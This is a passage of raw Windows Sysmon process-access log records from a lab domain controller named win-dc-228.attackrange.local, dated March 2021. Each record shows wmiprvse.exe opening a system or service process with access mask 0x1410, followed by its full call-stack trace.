dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204353Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204352Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8607-00000000AD01}4560C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204351Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8307-00000000AD01}1624C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204350Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F2-603E-7D07-00000000AD01}636C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204349Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F1-603E-7A07-00000000AD01}2736C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204348Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84BD-603E-DF00-00000000AD01}4964C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204347Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AF-603E-DC00-00000000AD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204346Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204345Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A3-603E-A900-00000000AD01}4912C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204344Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204343Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5B00-00000000AD01}3492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204342Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5800-00000000AD01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204341Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3400-00000000AD01}2960C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204340Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3300-00000000AD01}2668C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204339Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3100-00000000AD01}2400C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204338Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204337Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2F00-00000000AD01}2420C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204336Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204335Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2D00-00000000AD01}2308C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204334Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPC